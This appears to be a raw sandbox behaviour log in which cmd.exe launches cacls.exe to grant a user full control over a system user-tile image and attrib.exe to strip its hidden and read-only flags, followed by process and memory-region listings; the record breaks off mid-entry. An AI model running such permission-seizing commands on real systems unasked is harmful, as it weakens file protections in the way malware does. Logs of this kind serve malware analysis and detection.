0x1b [0192.012] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0192.012] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0192.012] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0192.012] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0192.012] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0192.012] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0192.013] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0192.013] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0192.013] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0192.013] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0192.013] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0192.013] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0192.013] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0192.013] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0192.013] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0192.013] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0192.013] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0192.013] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0192.013] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0192.013] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0192.013] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0192.013] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0192.013] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0192.013] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0192.013] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0192.013] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0192.013] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0192.013] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0192.013] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0192.013] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0192.013] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0192.013] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0192.013] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0192.013] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0192.013] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0192.013] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0192.013] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0192.013] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0192.013] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0192.013] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0192.013] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0192.013] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0192.013] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0192.013] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0192.013] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0192.013] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0192.013] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0192.013] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0192.014] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0192.014] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0192.014] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0192.014] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0192.014] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0192.014] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0192.014] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0192.014] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0192.014] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0192.014] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0192.014] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0192.014] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0192.014] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0192.014] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0192.014] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0192.014] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0192.014] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0192.014] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0192.014] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0192.014] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0192.014] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0192.014] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0192.014] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0192.014] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0192.014] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0192.014] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0192.014] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0192.014] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0192.014] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0192.014] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0192.014] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0192.014] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0192.014] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0192.014] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0192.015] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0192.015] SetErrorMode (uMode=0x0) returned 0x0 [0192.015] SetErrorMode (uMode=0x1) returned 0x0 [0192.015] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe1e98, lpFilePart=0x2cf084 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf084*="Desktop") returned 0x18 [0192.015] SetErrorMode (uMode=0x0) returned 0x1 [0192.015] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.015] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0192.020] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.021] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.021] GetLastError () returned 0x2 [0192.021] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.021] GetLastError () returned 0x2 [0192.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xe2180 [0192.022] FindClose (in: hFindFile=0xe2180 | out: hFindFile=0xe2180) returned 1 [0192.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.022] GetLastError () returned 0x2 [0192.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xe2180 [0192.022] FindClose (in: hFindFile=0xe2180 | out: hFindFile=0xe2180) returned 1 [0192.022] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0192.022] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0192.022] GetConsoleTitleW (in: lpConsoleTitle=0x2cf2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.022] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf180, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf248 | out: lpAttributeList=0x2cf180, lpSize=0x2cf248) returned 1 [0192.022] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf180, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf240, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf180, lpPreviousValue=0x0) returned 1 [0192.022] GetStartupInfoW (in: lpStartupInfo=0x2cf13c | out: lpStartupInfo=0x2cf13c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0192.023] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0192.024] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf1dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf228 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2cf228*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa9c, dwThreadId=0x9a0)) returned 1 [0192.026] CloseHandle (hObject=0x4c) returned 1 [0192.026] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0192.026] GetEnvironmentStringsW () returned 0xe0308* [0192.026] FreeEnvironmentStringsW (penv=0xe0308) returned 1 [0192.026] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0192.226] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf11c | out: lpExitCode=0x2cf11c*=0x0) returned 1 [0192.226] CloseHandle (hObject=0x50) returned 1 [0192.226] _vsnwprintf (in: _Buffer=0x2cf264, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf128 | out: _Buffer="00000000") returned 8 [0192.226] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0192.226] GetEnvironmentStringsW () returned 0xe2410* [0192.226] FreeEnvironmentStringsW (penv=0xe2410) returned 1 [0192.227] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0192.227] GetEnvironmentStringsW () returned 0xe2410* [0192.227] FreeEnvironmentStringsW (penv=0xe2410) returned 1 [0192.227] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf180 | out: lpAttributeList=0x2cf180) [0192.227] GetConsoleTitleW (in: lpConsoleTitle=0x2cf564, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.227] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.227] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0192.228] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.228] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.228] GetLastError () returned 0x2 [0192.228] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.228] GetLastError () returned 0x2 [0192.228] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xde4d8 [0192.228] FindClose (in: hFindFile=0xde4d8 | out: hFindFile=0xde4d8) returned 1 [0192.228] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xffffffff [0192.229] GetLastError () returned 0x2 [0192.229] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee00) returned 0xde4d8 [0192.229] FindClose (in: hFindFile=0xde4d8 | out: hFindFile=0xde4d8) returned 1 [0192.229] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0192.229] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0192.229] GetConsoleTitleW (in: lpConsoleTitle=0x2cf2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.229] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf180, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf248 | out: lpAttributeList=0x2cf180, lpSize=0x2cf248) returned 1 [0192.229] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf180, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf240, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf180, lpPreviousValue=0x0) returned 1 [0192.229] GetStartupInfoW (in: lpStartupInfo=0x2cf13c | out: lpStartupInfo=0x2cf13c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0192.229] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0192.229] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf1dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf228 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"", lpProcessInformation=0x2cf228*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb18, dwThreadId=0xa68)) returned 1 [0192.231] CloseHandle (hObject=0x50) returned 1 [0192.231] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0192.231] GetEnvironmentStringsW () returned 0xe2410* [0192.231] FreeEnvironmentStringsW (penv=0xe2410) returned 1 [0192.231] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0192.404] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2cf11c | out: lpExitCode=0x2cf11c*=0x0) returned 1 [0192.404] CloseHandle (hObject=0x4c) returned 1 [0192.404] _vsnwprintf (in: _Buffer=0x2cf264, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf128 | out: _Buffer="00000000") returned 8 [0192.404] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0192.404] GetEnvironmentStringsW () returned 0xe2410* [0192.404] FreeEnvironmentStringsW (penv=0xe2410) returned 1 [0192.404] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0192.405] GetEnvironmentStringsW () returned 0xe2410* [0192.405] FreeEnvironmentStringsW (penv=0xe2410) returned 1 [0192.405] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf180 | out: lpAttributeList=0x2cf180) [0192.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.405] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.405] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.405] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.405] SetConsoleInputExeNameW () returned 0x1 [0192.405] GetConsoleOutputCP () returned 0x1b5 [0192.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.405] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.405] exit (_Code=0) Process: id = "433" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167e0" os_pid = "0xa9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "432" os_parent_pid = "0xa90" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28235 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28236 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28237 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28238 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 28239 start_va = 0x9d0000 end_va = 0x9d8fff entry_point = 0x9d0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 28240 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28241 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28242 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28243 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28244 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28245 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28246 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28247 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28248 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 28249 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 28250 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28251 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28252 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28253 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28254 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28255 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28256 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 623 os_tid = 0x9a0 Thread: id = 624 os_tid = 0xdd8 Process: id = "434" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0xb18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "432" os_parent_pid = "0xa90" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28263 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28264 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28265 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28266 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 28267 start_va = 0x280000 end_va = 0x286fff entry_point = 0x280000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28268 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28269 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28270 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28271 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28272 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28273 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28274 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28275 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28276 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 28277 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 28278 start_va = 0x6de90000 end_va = 0x6deacfff entry_point = 0x6de90000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28279 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28280 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28281 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: 